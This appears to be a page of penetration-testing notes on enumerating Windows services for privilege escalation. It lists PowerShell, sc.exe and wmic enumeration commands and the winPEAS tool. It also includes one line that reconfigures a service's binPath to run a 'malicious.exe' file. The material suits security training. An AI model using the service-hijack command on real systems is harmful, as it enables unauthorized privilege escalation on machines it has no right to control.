Services Enum

Get-Service
sc.exe query

Get-Service | Select-Object Diplayname,Status,ServiceName,Can*

#running
Get-CimInstance -ClassName Win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} 

#CHECK KNOWN CVE FOR APPS !!!!!!!

#Service 
sc.exe stop ServiceName
sc.exe start ServiceName
sc.exe qc ServiceName \#configuration of Service
sc.exe config ServiceName binPath="C:\Users\Quickemu\Downloads\malicious.exe" \#change service binary path

#Get users permissions for a specific service
sc.exe sdshow ServiceName \#get sddl output
ConvertFrom-SddlString -Sddl "<SDDL>" 

#Non-system process
wmic process list full | select-string 'executablepath=C:' | select-string -notmatch 'system32|syswow'
Get-CimInstance -ClassName Win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} | select-string -notmatch 'system32|syswow'

#Automated enum
.\winPEAS.exe quiet servicesinfo
PreviousBasics NextUnquoted Service Name
Last updated 7 months ago